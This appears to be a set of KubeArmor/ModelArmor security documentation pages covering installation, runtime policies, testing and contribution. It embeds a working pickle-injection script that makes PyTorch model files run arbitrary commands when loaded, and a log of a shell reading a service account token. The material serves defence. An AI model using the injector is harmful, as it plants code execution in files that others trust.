ModelArmor uses KubeArmor as a sandboxing engine to ensure that untrusted model execution is constrained and subject to the required checks. AI/ML models are essentially processes, and allowing untrusted models to execute in AI environments carries significant risks, such as cryptomining attacks leveraging GPUs, remote command injection, and more. KubeArmor's preemptive mitigation mechanism provides a suitable framework for constraining the execution environment of models.
ModelArmor can be used to enforce security policies on the model execution environment.
KubeArmor is a cloud-native runtime security enforcement system that restricts the behavior (such as process execution, file access, and networking operations) of pods, containers, and nodes (VMs) at the system level.
KubeArmor leverages Linux security modules (LSMs) such as AppArmor, SELinux, or BPF-LSM to enforce the user-specified policies. KubeArmor generates rich alerts/telemetry events with container/pod/namespace identities by leveraging eBPF.
💪 Harden Infrastructure: ⛓️ Protect critical paths such as cert bundles · 📋 MITRE, STIGs, CIS based rules · 🛅 Restrict access to raw DB tables
💍 Least Permissive Access: 🚥 Process Whitelisting · 🚥 Network Whitelisting · 🎛️ Control access to sensitive assets
🔭 Application Behavior: 🧬 Process execs, File System accesses · 🧭 Service binds, Ingress, Egress connections · 🔬 Sensitive system call profiling
❄️ Deployment Models: ☸️ Kubernetes Deployment · 🐋 Containerized Deployment · 💻 VM/Bare-Metal Deployment
KubeArmor uses Tracee's system call utility functions.
KubeArmor is a Sandbox Project of the Cloud Native Computing Foundation.
The KubeArmor roadmap is tracked via KubeArmor Projects.
This guide assumes you have access to a k8s cluster. If you want to try non-k8s mode, for instance systemd mode to protect/audit containers or processes on VMs/bare-metal, check here.
Check the KubeArmor support matrix to verify if your platform is supported.
helm repo add kubearmor https://kubearmor.github.io/charts
helm repo update kubearmor
helm upgrade --install kubearmor-operator kubearmor/kubearmor-operator -n kubearmor --create-namespace
kubectl apply -f https://raw.githubusercontent.com/kubearmor/KubeArmor/main/pkg/KubeArmorOperator/config/samples/sample-config.yml
You can find more details about helm related values and configurations here.
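To confirm the installation, you can check that the KubeArmor pods come up in the kubearmor namespace created above (a quick sanity check, not a required step):
kubectl get pods -n kubearmor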
curl -sfL http://get.kubearmor.io/ | sudo sh -s -- -b /usr/local/bin
# sudo access is needed to install it in /usr/local/bin directory. But, if you prefer not to use sudo, you can install it in a different directory which is in your PATH.
[!NOTE] The kArmor CLI provides a developer-friendly way to interact with KubeArmor telemetry. You can also stream KubeArmor telemetry independently of the kArmor CLI tool and integrate it with your chosen SIEM (Security Information and Event Management) solution; here's a guide on how to achieve this integration. This guide assumes you use the kArmor CLI to access KubeArmor telemetry, but once integrated you can view it in your SIEM tool instead.
kubectl create deployment nginx --image=nginx
POD=$(kubectl get pod -l app=nginx -o name)
[!NOTE] $POD is used to refer to the target nginx pod in many of the examples below.
This recipe explains how to use KubeArmor directly on a VM/Bare-Metal machine; we tested the following steps on Ubuntu hosts.
The recipe installs kubearmor as a systemd process and the karmor CLI tool to manage policies and show alerts/telemetry.
Download the latest release of KubeArmor.
Install KubeArmor (VER is the kubearmor release version):
sudo apt --no-install-recommends install ./kubearmor_${VER}_linux-amd64.deb
Note that the above command doesn't install the recommended packages, as we ship the object files along with the package. If you don't have BTF, consider removing the --no-install-recommends flag.
sudo systemctl start kubearmor
Check the status of KubeArmor using sudo systemctl status kubearmor
or use sudo journalctl -u kubearmor -f
to continuously monitor kubearmor logs.
The following policy denies execution of the sleep binary on the host:
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: hsp-kubearmor-dev-proc-path-block
spec:
  nodeSelector:
    matchLabels:
      kubearmor.io/hostname: "*" # Apply to all hosts
  process:
    matchPaths:
    - path: /usr/bin/sleep # try sleep 1
  action:
    Block
Save the above policy to hostpolicy.yaml and apply it:
karmor vm policy add hostpolicy.yaml
Now if you run the sleep command, the process will be denied execution.
Note that sleep may not be blocked if you run it in the same terminal where you applied the above policy. In that case, please open a new terminal and run sleep again to see whether the command is blocked.
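For example, in a new terminal the blocked execution might look like this (the exact error text can vary by shell and distribution):
$ sleep 1
-bash: /usr/bin/sleep: Permission denied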
karmor logs --gRPC=:32767 --json
{
"Timestamp":1717259989,
"UpdatedTime":"2024-06-01T16:39:49.360067Z",
"HostName":"kubearmor-dev",
"HostPPID":1582,
"HostPID":2420,
"PPID":1582,
"PID":2420,
"UID":1000,
"ParentProcessName":"/usr/bin/bash",
"ProcessName":"/usr/bin/sleep",
"PolicyName":"hsp-kubearmor-dev-proc-path-block",
"Severity":"1",
"Type":"MatchedHostPolicy",
"Source":"/usr/bin/bash",
"Operation":"Process",
"Resource":"/usr/bin/sleep",
"Data":"lsm=SECURITY_BPRM_CHECK",
"Enforcer":"BPFLSM",
"Action":"Block",
"Result":"Permission denied",
"Cwd":"/"
}
karmor profile provides a real-time terminal UI that visualizes security-relevant activity observed by KubeArmor, including Process, File, and Network events. It fetches live data from the KubeArmor logs API, displays counters and key details for each event type, and supports easy navigation and filtering.
karmor profile
The karmor profile command allows you to filter logs or alerts using a set of useful flags. These filters help narrow down the output to specific Kubernetes objects like containers, pods, and namespaces.
-c, --container: Filters logs by container name.
-n, --namespace: Filters logs by Kubernetes namespace.
--pod: Filters logs by pod name.
karmor profile -c nginx
Outputs logs only from the container named nginx.
karmor profile -n nginx1
Outputs logs only from the namespace nginx1.
karmor profile --pod nginx-pod-1
Outputs logs only from the pod named nginx-pod-1.
You can combine filters to narrow down the logs even further.
karmor profile -n nginx1 -c nginx
Outputs logs only from the nginx container in the nginx1 namespace.
Use these filters during profiling sessions to quickly isolate behavior or security events related to a specific pod, container, or namespace.
KubeArmor helps organizations enforce a zero trust posture within their Kubernetes clusters. It allows users to define an allow-based policy that allows specific operations, and denies or audits all other operations. This helps to ensure that only authorized activities are allowed within the cluster, and that any deviations from the expected behavior are denied and flagged for further investigation.
By implementing a zero trust posture with KubeArmor, organizations can increase their security posture and reduce the risk of unauthorized access or activity within their Kubernetes clusters. This can help to protect sensitive data, prevent system breaches, and maintain the integrity of the cluster.
KubeArmor supports allow-based policies, which result in specific actions being allowed and everything else being denied or audited. For example, a specific pod/container might only invoke a set of binaries at runtime. As part of allow-based rules, you specify the set of processes that are allowed, and everything else is either audited or denied based on the default security posture.
Install the nginx deployment using kubectl create deployment nginx --image=nginx.
Set the default security posture to default-deny.
kubectl annotate ns default kubearmor-file-posture=block --overwrite
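You can verify that the annotation was set before applying the policy:
kubectl describe ns default | grep kubearmor-file-posture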
Apply the following policy:
cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: only-allow-nginx-exec
spec:
  selector:
    matchLabels:
      app: nginx
  file:
    matchDirectories:
    - dir: /
      recursive: true
  process:
    matchPaths:
    - path: /usr/sbin/nginx
    - path: /bin/bash
  action:
    Allow
EOF
Observe that the policy contains the Allow action. Once any KubeArmor policy with the Allow action applies to a pod, the pod enters least-permissive mode, allowing only explicitly allowed operations.
Note: Use kubectl port-forward $POD --address 0.0.0.0 8080:80 to access nginx and you can see that the nginx web access still works normally.
Let's try to execute some other process:
kubectl exec -it $POD -- bash -c "chroot"
This will be denied with a permission error.
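A denied execution might look like the following (output is illustrative and depends on the image):
$ kubectl exec -it $POD -- bash -c "chroot"
bash: line 1: chroot: Permission denied
command terminated with exit code 126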
Achieving a Zero Trust security posture is difficult. The more difficult part is maintaining that posture across application updates, and there is a risk of application downtime if the security posture is not correctly identified. While KubeArmor provides a way to enforce a Zero Trust security posture, identifying the policies/rules for achieving it is non-trivial, and we recommend keeping policies in dry-run mode (the default audit mode) before switching to default-deny.
KubeArmor provides a framework to smooth the journey to a Zero Trust posture. For example, it is possible to set dry-run/audit mode at the namespace level by configuring the security posture, so different namespaces can run in different default security posture modes (default-deny vs default-audit). Users can switch a namespace to default-deny mode once they are comfortable with the settings, i.e., once they no longer see unexpected alerts.
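For example, a namespace can be kept in audit mode while you tune policies and switched to block once alerts settle (the namespace name here is illustrative):
# keep the namespace in audit mode while tuning policies
kubectl annotate ns staging kubearmor-file-posture=audit --overwrite
# switch to default-deny once no unexpected alerts are seen
kubectl annotate ns staging kubearmor-file-posture=block --overwrite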
KubeArmor is a runtime security enforcement system for containers and nodes. It uses security policies (defined as Kubernetes Custom Resources like KSP, HSP, and CSP) to define allowed, audited, or blocked actions for workloads. The system monitors system activity using kernel technologies such as eBPF and enforces the defined policies by integrating with the underlying operating system's security modules like AppArmor, SELinux, or BPF-LSM, sending security alerts and telemetry through a log feeder.
KubeArmor has visibility into systems and application behavior. KubeArmor summarizes/aggregates the information and provides a user-friendly view to figure out the application behavior.
Process data:
What are the processes executing in the pods?
What processes are executing through which parent processes?
File data:
What are the file system accesses made by different processes?
Network Accesses:
What are the Ingress/Egress connections from the pod?
What server binds are done in the pod?
Get visibility into process executions in the default namespace.
Adversarial attacks exploit vulnerabilities in AI systems by subtly altering input data to mislead the model into incorrect predictions or decisions. These perturbations are often imperceptible to humans but can significantly degrade the system's performance.
By Model Access:
White-box Attacks: Complete knowledge of the model, including architecture and training data.
Black-box Attacks: No information about the model; the attacker probes responses to craft inputs.
By Target Objective:
Non-targeted Attacks: Push input to any incorrect class.
Targeted Attacks: Force input into a specific class.
Training Phase Attacks:
Data Poisoning: Injects malicious data into the training set, altering model behavior.
Backdoor Attacks: Embeds triggers in training data that activate specific responses during inference.
Inference Phase Attacks:
Model Evasion: Gradually perturbs input to skew predictions (e.g., targeted misclassification).
Membership Inference: Exploits model outputs to infer sensitive training data (e.g., credit card numbers).
Highly accurate models often exhibit reduced robustness against adversarial perturbations, creating a tradeoff between accuracy and security. For instance, Chen et al. found that better-performing models tend to be more sensitive to adversarial inputs.
Pre-analysis: Test models for prompt injection vulnerabilities using techniques like fuzzing.
Input Sanitization:
Validation: Enforce strict input rules (e.g., character and data type checks).
Filtering: Strip malicious scripts or fragments.
Encoding: Convert special characters to safe representations.
Secure Practices for Model Deployment:
Restrict model permissions.
Regularly update libraries to patch vulnerabilities.
Detect injection attempts with specialized tooling.
Python's pickle module allows serialization and deserialization but lacks security checks. Attackers can exploit this to execute arbitrary code using crafted payloads. The module's inherent insecurity makes it risky to use with untrusted inputs.
Mitigation:
Avoid using pickle with untrusted sources.
Use secure serialization libraries like json or protobuf.
karmor logs -n default --json --logFilter all --operation process
{
"Timestamp": 1686491023,
"UpdatedTime": "2023-06-11T13:43:43.289380Z",
"ClusterName": "default",
"HostName": "ip-172-31-24-142",
"NamespaceName": "default",
"PodName": "nginx-8f458dc5b-fl42t",
"Labels": "app=nginx",
"ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",
"ContainerName": "nginx",
"ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
"ParentProcessName": "/x86_64-bottlerocket-linux-gnu/sys-root/usr/bin/runc",
"ProcessName": "/bin/sh",
"HostPPID": 3488352,
"HostPID": 3488357,
"PPID": 3488352,
"PID": 832,
"Type": "ContainerLog",
"Source": "/x86_64-bottlerocket-linux-gnu/sys-root/usr/bin/runc",
"Operation": "Process",
"Resource": "/bin/sh -c cat /run/secrets/kubernetes.io/serviceaccount/token",
"Data": "syscall=SYS_EXECVE",
"Result": "Passed"
}
{
"Timestamp": 1686491023,
"UpdatedTime": "2023-06-11T13:43:43.291471Z",
"ClusterName": "default",
"HostName": "ip-172-31-24-142",
"NamespaceName": "default",
"PodName": "nginx-8f458dc5b-fl42t",
"Labels": "app=nginx",
"ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",
"ContainerName": "nginx",
"ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
"ParentProcessName": "/bin/dash",
"ProcessName": "/bin/cat",
"HostPPID": 3488357,
"HostPID": 3488363,
"PPID": 832,
"PID": 838,
"Type": "ContainerLog",
"Source": "/bin/dash",
"Operation": "Process",
"Resource": "/bin/cat /run/secrets/kubernetes.io/serviceaccount/token",
"Data": "syscall=SYS_EXECVE",
"Result": "Passed"
}
The Pickle Code Injection Proof of Concept (PoC) demonstrates the security vulnerabilities in Python's pickle module, which can be exploited to execute arbitrary code during deserialization. This method is inherently insecure because it allows execution of arbitrary functions without restrictions or security checks.
Custom Pickle Injector:
import os, argparse, pickle, struct, shutil
from pathlib import Path
import torch

class PickleInject:
    def __init__(self, inj_objs, first=True):
        self.inj_objs = inj_objs
        self.first = first

    class _Pickler(pickle._Pickler):
        def __init__(self, file, protocol, inj_objs, first=True):
            super().__init__(file, protocol)
            self.inj_objs = inj_objs
            self.first = first

        def dump(self, obj):
            if self.proto >= 2:
                self.write(pickle.PROTO + struct.pack("<B", self.proto))
            if self.first:
                for inj_obj in self.inj_objs:
                    self.save(inj_obj)
            self.save(obj)
            if not self.first:
                for inj_obj in self.inj_objs:
                    self.save(inj_obj)
            self.write(pickle.STOP)

    def Pickler(self, file, protocol):
        return self._Pickler(file, protocol, self.inj_objs)

    class _PickleInject:
        def __init__(self, args, command=None):
            self.command = command
            self.args = args

        def __reduce__(self):
            return self.command, (self.args,)

    class System(_PickleInject):
        def __init__(self, args):
            super().__init__(args, command=os.system)

    class Exec(_PickleInject):
        def __init__(self, args):
            super().__init__(args, command=exec)

    class Eval(_PickleInject):
        def __init__(self, args):
            super().__init__(args, command=eval)

    class RunPy(_PickleInject):
        def __init__(self, args):
            import runpy
            super().__init__(args, command=runpy._run_code)

        def __reduce__(self):
            return self.command, (self.args, {})

# Parse arguments
parser = argparse.ArgumentParser(description="PyTorch Pickle Inject")
parser.add_argument("model", type=Path)
parser.add_argument("command", choices=["system", "exec", "eval", "runpy"])
parser.add_argument("args")
args = parser.parse_args()

# Payload construction
command_args = args.args
if os.path.isfile(command_args):
    with open(command_args, "r") as in_file:
        command_args = in_file.read()

if args.command == "system":
    payload = PickleInject.System(command_args)
elif args.command == "exec":
    payload = PickleInject.Exec(command_args)
elif args.command == "eval":
    payload = PickleInject.Eval(command_args)
elif args.command == "runpy":
    payload = PickleInject.RunPy(command_args)

# Save the injected payload
backup_path = f"{args.model}.bak"
shutil.copyfile(args.model, backup_path)
torch.save(torch.load(args.model), f=args.model, pickle_module=PickleInject([payload]))
Print Injection:
python torch_pickle_inject.py model.pth exec "print('hello')"
Install Packages:
python torch_pickle_inject.py model.pth system "pip install numpy"
Adversarial Command Execution: Upon loading the tampered model:
python main.py
Output:
Installs the package or executes the payload.
Alters model behavior: changes predictions, losses, etc.
Spreading Malware: The injected code can download and install malware on the target machine, which can then be used to infect other systems in the network or create a botnet.
Backdoor Installation: An attacker can use pickle injection to install a backdoor that allows persistent access to the system, even if the original vulnerability is patched.
Data Exfiltration: An attacker can use pickle injection to read sensitive files or data from the system and send it to a remote server. This can include configuration files, database credentials, or any other sensitive information stored on the machine.
The pickle module is inherently insecure for handling untrusted input due to its ability to execute arbitrary code.
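Because a poisoned model ultimately has to spawn a process (for example, os.system launching a shell or pip) to do damage, a KubeArmor policy can constrain the model-serving workload itself. The following is a minimal sketch, assuming pods labeled app=model-server and a Python interpreter at /usr/bin/python3; the label, interpreter path, and pip path are illustrative and should be adjusted for your environment:
cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-shell-from-model-server   # hypothetical policy name
  namespace: default
spec:
  severity: 7
  selector:
    matchLabels:
      app: model-server                  # assumed workload label
  process:
    matchPaths:
    - path: /bin/sh                      # block shells spawned by the interpreter
      fromSource:
      - path: /usr/bin/python3           # assumed interpreter path
    - path: /usr/bin/apt
    - path: /usr/local/bin/pip           # assumed pip location
  action:
    Block
EOF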
There are two ways to check the functionalities of KubeArmor: 1) testing KubeArmor manually and 2) using the testing framework.
Although there are many ways to run a Kubernetes cluster (such as minikube or kind), they will not work with a locally developed KubeArmor. KubeArmor needs to run on the same machine as the Kubernetes node, and minikube and kind use virtualized nodes, so KubeArmor would not identify your node. You would either need to build your images and deploy them into these clusters, or simply use k3s or kubeadm for development purposes. If you are new to these terms, the easiest way is to follow this guide:
Beforehand, check if the KubeArmorPolicy and KubeArmorHostPolicy CRDs are already applied.
If they are still not applied, do so.
Now you can apply specific policies.
You can refer to the security policies defined for the example microservices.
Watch alerts using the karmor CLI tool with the following flags:
Note that you will only see alerts and logs generated after karmor logs starts running; thus, we recommend running the above command in another terminal to see logs live.
The case that KubeArmor is directly running in a host
Compile KubeArmor
Run the auto-testing framework
Check the test report
The case that KubeArmor is running as a daemonset in Kubernetes
Run the testing framework
Check the test report
To run a specific suite of tests, move to the directory of the test and run:
$ kubectl proxy &
~/KubeArmor/KubeArmor$ make run
$ kubectl proxy &
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make clean && make
~/KubeArmor/KubeArmor$ sudo -E ./kubearmor -gRPC=[gRPC port number]
-logPath=[log file path]
-enableKubeArmorPolicy=[true|false]
-enableKubeArmorHostPolicy=[true|false]
$ kubectl explain KubeArmorPolicy
$ kubectl apply -f ~/KubeArmor/deployments/CRD/
$ kubectl apply -f [policy file]
$ kubectl -n [namespace name] exec -it [pod name] -- bash -c [command]
$ karmor log [flags]
--gRPC string gRPC server information
--help help for log
--json Flag to print alerts and logs in the JSON format
--logFilter string What kinds of alerts and logs to receive, {policy|system|all} (default "policy")
--logPath string Output location for alerts and logs, {path|stdout|none} (default "stdout")
--msgPath string Output location for messages, {path|stdout|none} (default "none")
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make clean && make
$ cd KubeArmor/tests
~/KubeArmor/tests$ ./test-scenarios-local.sh
~/KubeArmor/tests$ cat /tmp/kubearmor.test
$ cd KubeArmor/tests
~/KubeArmor/tests$ ./test-scenarios-in-runtime.sh
~/KubeArmor/tests$ cat /tmp/kubearmor.test
~/KubeArmor/tests/test_directory$ ginkgo --focus "Suit_Name"
Here, we demonstrate how to define host security policies.
Process Execution Restriction
Block a specific executable (hsp-kubearmor-dev-proc-path-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: hsp-kubearmor-dev-proc-path-block
spec:
  nodeSelector:
    matchLabels:
      kubernetes.io/hostname: kubearmor-dev
  severity: 5
  process:
    matchPaths:
    - path: /usr/bin/diff
  action:
    Block
Explanation: The purpose of this policy is to block the execution of '/usr/bin/diff' in a host whose host name is 'kubearmor-dev'. For this, we define 'kubernetes.io/hostname: kubearmor-dev' in nodeSelector -> matchLabels and the specific path ('/usr/bin/diff') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please open a new terminal (or connect to the host with a new session) and run '/usr/bin/diff'. You will see that /usr/bin/diff is blocked.
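For example, the blocked execution may look like this (output is illustrative):
$ diff /etc/hostname /etc/hosts
-bash: /usr/bin/diff: Permission denied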
NOTE
The given policy works with almost every Linux distribution. If it is not working in your case, check the location of the target binary. For example, the sleep binary lives in different places in different Ubuntu releases:
In case of Ubuntu 20.04: /usr/bin/sleep
In case of Ubuntu 18.04: /bin/sleep
File Access Restriction
Audit a critical file access (hsp-kubearmor-dev-file-path-audit.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: hsp-kubearmor-dev-file-path-audit
spec:
  nodeSelector:
    matchLabels:
      kubernetes.io/hostname: kubearmor-dev
  severity: 5
  file:
    matchPaths:
    - path: /etc/passwd
  action:
    Audit
Explanation: The purpose of this policy is to audit any accesses to a critical file (i.e., '/etc/passwd'). Since we want to audit one critical file, we use matchPaths to specify the path of '/etc/passwd'.
Verification: After applying this policy, please open a new terminal (or connect to the host with a new session) and run 'sudo cat /etc/passwd'. Then, check the alert logs of KubeArmor.
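One way to verify is to stream alerts in one terminal and trigger the audited access in another (in systemd mode you may need to pass --gRPC as shown earlier):
# terminal 1: stream policy alerts
karmor logs --logFilter policy
# terminal 2: trigger the audited access
sudo cat /etc/passwd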
System calls alerting
Alert for all unlink syscalls:
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: audit-all-unlink
spec:
  severity: 3
  nodeSelector:
    matchLabels:
      kubernetes.io/hostname: vagrant
  syscalls:
    matchSyscalls:
    - syscall:
      - unlink
  action:
    Audit
Alert on all rmdir syscalls targeting anything in the /home/ directory and its sub-directories:
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: audit-home-rmdir
spec:
  severity: 3
  nodeSelector:
    matchLabels:
      kubernetes.io/hostname: vagrant
  syscalls:
    matchPaths:
    - syscall:
      - rmdir
      path: /home/
      recursive: true
  action:
    Audit
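To verify, create and remove a directory under /home/ and then check the audit events (the path is illustrative):
mkdir /home/vagrant/demo-dir && rmdir /home/vagrant/demo-dir
karmor logs --logFilter all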
Welcome to the KubeArmor tutorial! In this first chapter, we'll dive into one of the most fundamental concepts in KubeArmor: Security Policies. Think of these policies as the instruction manuals or rulebooks you give to KubeArmor, telling it exactly how applications and system processes should behave.
In any secure system, you need rules that define what is allowed and what isn't. In Kubernetes and Linux, these rules can get complicated, dealing with things like which files a program can access, which network connections it can make, or which powerful system features (capabilities) it's allowed to use.
KubeArmor simplifies this by letting you define these rules using clear, easy-to-understand Security Policies. You write these policies in a standard format that Kubernetes understands (YAML files, using something called Custom Resource Definitions or CRDs), and KubeArmor takes care of translating them into the low-level security configurations needed by the underlying system.
These policies are powerful because they allow you to specify security rules for different parts of your system:
KubeArmorPolicy (KSP): For individual Containers or Pods running in your Kubernetes cluster.
KubeArmorHostPolicy (HSP): For the Nodes (the underlying Linux servers) where your containers are running. This is useful for protecting the host system itself, or even applications running directly on the node outside of Kubernetes.
KubeArmorClusterPolicy (CSP): For applying policies across multiple Containers/Pods based on namespaces or labels cluster-wide.
Imagine you have a web server application running in a container. This application should only serve web pages and access its configuration files. It shouldn't be trying to access sensitive system files like /etc/shadow
or connecting to unusual network addresses.
Without security policies, if your web server container gets compromised, an attacker might use it to access or modify sensitive data, or even try to attack other parts of your cluster or network.
KubeArmor policies help prevent this by enforcing the principle of least privilege. This means you only grant your applications and host processes the minimum permissions they need to function correctly.
Use Case Example: Let's say you have a simple application container that should never be allowed to read the /etc/passwd
file inside the container. We can use a KubeArmor Policy (KSP) to enforce this rule.
KubeArmor policies are defined as YAML files that follow a specific structure. This structure includes:
Metadata: Basic information about the policy, like its name. For KSPs, you also specify the namespace it belongs to. HSPs and CSPs are cluster-scoped, meaning they don't belong to a specific namespace.
Selector: This is how you tell KubeArmor which containers, pods, or nodes the policy should apply to. You typically use Kubernetes labels for this.
Spec (Specification): This is the core of the policy where you define the actual security rules (what actions are restricted) and the desired outcome (Allow, Audit, or Block).
Let's look at a simplified structure:
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy # or KubeArmorHostPolicy, KubeArmorClusterPolicy
metadata:
  name: block-etc-passwd-read
  namespace: default # Only for KSP
spec:
  selector:
    # How to select the targets (pods for KSP, nodes for HSP, namespaces/labels for CSP)
    matchLabels:
      app: my-web-app # Apply this policy to pods with label app=my-web-app
  file: # Or 'process', 'network', 'capabilities', 'syscalls'
    matchPaths:
    - path: /etc/passwd
  action: Block # What to do if the rule is violated
Explanation:
- apiVersion and kind: Identify this document as a KubeArmor Policy object.
- metadata: Gives the policy a name (block-etc-passwd-read) and specifies the namespace (default) it lives in (for KSP).
- spec: Contains the security rules.
- selector: Uses matchLabels to say "apply this policy to any Pod in the default namespace that has the label app: my-web-app".
- file: This section defines rules related to file access.
- matchPaths: We want to match a specific file path.
- path: /etc/passwd: The specific file we are interested in.
- action: Block: If any process inside the selected containers tries to access /etc/passwd, the action should be to Block that attempt.
This simple policy directly addresses our use case: preventing the web server (app: my-web-app) from reading /etc/passwd.
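Applying and exercising the policy could look like this, assuming the YAML above is saved as block-etc-passwd-read.yaml and a pod labeled app=my-web-app exists in the default namespace:
kubectl apply -f block-etc-passwd-read.yaml
# pick a pod matched by the selector and try the forbidden access
POD=$(kubectl get pod -l app=my-web-app -o name | head -n 1)
kubectl exec -it $POD -- cat /etc/passwd   # expected: Permission denied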
Let's break down the three types:
| Policy Kind | Abbreviation | Applies To | Selector |
| --- | --- | --- | --- |
| KubeArmorPolicy | KSP | Containers / Pods (Scoped by Namespace) | matchLabels, matchExpressions |
| KubeArmorHostPolicy | HSP | Nodes / Host OS | nodeSelector (matchLabels) |
| KubeArmorClusterPolicy | CSP | Containers / Pods (Cluster-wide) | selector (matchExpressions on namespace or label) |
KubeArmorPolicy (KSP)
Applies to pods within a specific Kubernetes namespace.
Uses selector.matchLabels or selector.matchExpressions to pick which pods the policy applies to, based on their labels.
Example: Block /bin/bash execution in all pods within the dev namespace labeled role=frontend.
KubeArmorHostPolicy (HSP)
Applies to the host operating system of the nodes in your cluster.
Uses nodeSelector.matchLabels to pick which nodes the policy applies to, based on node labels.
Example: Prevent the /usr/bin/ssh process on nodes labeled node-role.kubernetes.io/worker from accessing /etc/shadow.
KubeArmorClusterPolicy (CSP)
Applies to pods across multiple namespaces or even the entire cluster.
Uses selector.matchExpressions, which can target namespaces (key: namespace) or labels (key: label) cluster-wide.
Example: Audit all network connections made by pods in the default or staging namespaces. Or, block /usr/bin/curl execution in all pods across the cluster except those labeled app=allowed-tools.
These policies become Kubernetes Custom Resources when KubeArmor is installed. You can see their definitions in the KubeArmor source code under the deployments/CRD directory:
KubeArmorPolicy CRD (KSP)
KubeArmorHostPolicy CRD (HSP)
And their corresponding Go type definitions are in types/types.go. You don't need to understand Go or CRD internals right now, just know that these files formally define the structure and rules for creating KubeArmor policies that Kubernetes understands.
You've written a policy YAML file. What happens when you apply it to your Kubernetes cluster using kubectl apply -f your-policy.yaml?
Policy Creation: You create the policy object in the Kubernetes API Server.
KubeArmor Watches: The KubeArmor DaemonSet (a component running on each node) is constantly watching the Kubernetes API Server for KubeArmor policy objects (KSP, HSP, CSP).
Policy Discovery: KubeArmor finds your new policy.
Target Identification: KubeArmor evaluates the policy's selector (or nodeSelector) to figure out exactly which pods/containers or nodes this policy applies to.
Translation: For each targeted container or node, KubeArmor translates the high-level rules defined in the policy's spec (like "Block access to /etc/passwd") into configurations for the underlying security enforcer (which could be AppArmor, SELinux, or BPF, depending on your setup and KubeArmor's configuration - we'll talk more about these later).
Enforcement: The security enforcer on that specific node is updated with the new low-level rules. Now, if a targeted process tries to do something forbidden by the policy, the enforcer steps in to Allow, Audit, or Block the action as specified.
Here's a simplified sequence:
This flow shows how KubeArmor acts as the bridge between your easy-to-write YAML policies and the complex, low-level security mechanisms of the operating system.
Every rule in a KubeArmor policy (within the spec section) specifies an action. This tells KubeArmor what to do if the rule's condition is met.
Allow: Explicitly permits the action. This is useful for creating "whitelist" policies where you only allow specific behaviors and implicitly block everything else.
Audit: Does not prevent the action but generates a security alert or log message when it happens. This is great for testing policies before enforcing them or for monitoring potentially suspicious activity without disrupting applications.
Block: Prevents the action from happening and generates a security alert. This is for enforcing strict "blacklist" rules where you explicitly forbid certain dangerous behaviors.
Remember the "Note" mentioned in the provided policy specifications: For system call monitoring (syscalls
), KubeArmor currently only supports the Audit
action, regardless of what is specified in the policy YAML.
In this chapter, you learned that KubeArmor Security Policies (KSP, HSP, CSP) are your rulebooks for defining security posture in your Kubernetes environment. You saw how they use Kubernetes concepts like labels and namespaces to target specific containers, pods, or nodes. You also got a peek at the basic structure of these policies, including the selector for targeting and the spec for defining rules and actions.
Understanding policies is the first step to using KubeArmor effectively to protect your workloads and infrastructure. In the next chapter, we'll explore how KubeArmor identifies the containers and nodes it is protecting, which is crucial for the policy engine to work correctly.
KubeArmor maintainers welcome individuals and organizations from across the cloud security landscape (creators and implementers alike) to make contributions to the project. We equally value the addition of technical contributions and enhancements of documentation that helps us grow the community and strengthen the value of KubeArmor. We invite members of the community to contribute to the project!
To make a contribution, please follow the steps below.
Fork this repository (KubeArmor)
First, fork this repository by clicking on the Fork button (top right).
Then, click your ID on the pop-up screen.
This will create a copy of KubeArmor in your account.
Clone the repository
Now clone KubeArmor locally into your dev environment.
$ git clone https://github.com/[your GitHub ID]/KubeArmor
This creates a copy of KubeArmor in your dev environment.
Make changes
First, go into the repository directory and make some changes.
Please refer to development guide to set up your environment for KubeArmor contribution.
Check the changes
If you have changed the core code of KubeArmor then please run tests before committing the changes
cd tests
~/KubeArmor/tests$ make
If you see any warnings or errors, please fix them first.
If some tests are failing, then fix them by following Testing Guide
If you have made changes in Operator or Controller, then follow this
Commit changes
Please see your changes using "git status" and add them to the branch using "git add".
$ cd KubeArmor
~/KubeArmor$ git status
~/KubeArmor$ git add [changed file]
Then, commit the changes using the "git commit" command.
~/KubeArmor$ git commit -s -m "Add a new feature by [your name]"
Please make sure that your changes are properly tested on your machine.
Push changes to your forked repository
Push your changes using the "git push" command.
~/KubeArmor$ git push
Create a pull request with your changes with the following steps
First, go to your repository on GitHub.
Then, click "Pull request" button.
After checking your changes, click 'Create pull request'.
A pull request should contain the details of all commits as specific as possible, including "Fixes: #(issue number)".
Finally, click the "Create pull request" button.
The changes would be merged post a review by the respective module owners. Once the changes are merged, you will get a notification, and the corresponding issue will be closed.
DCO Signoffs
To ensure that contributors are only submitting work that they have rights to, we are requiring everyone to acknowledge this by signing their work. Any copyright notices in this repo should specify the authors as "KubeArmor authors".
To sign your work, just add a line like this at the end of your commit message:
Signed-off-by: FirstName LastName <email@example.com>
This can easily be done with the -s or --signoff option to git commit.
By doing this, you state that the source code being submitted originated from you (see https://developercertificate.org).
KubeArmor currently supports enabling visibility for containers and hosts.
Visibility for hosts is not enabled by default; however, it is enabled by default for containers.
The karmor tool provides access to both using karmor logs.
If you don't have access to a K8s cluster, please follow the setup guide to set one up.
Install the karmor CLI tool.
To deploy the sample app, follow the deployment guide.
Now we need to deploy some sample policies.
This sample policy blocks execution of the apt and apt-get commands in wordpress pods with label selector app: wordpress.
Checking default visibility
Container visibility is enabled by default. We can check it using kubectl describe and grep for kubearmor-visibility.
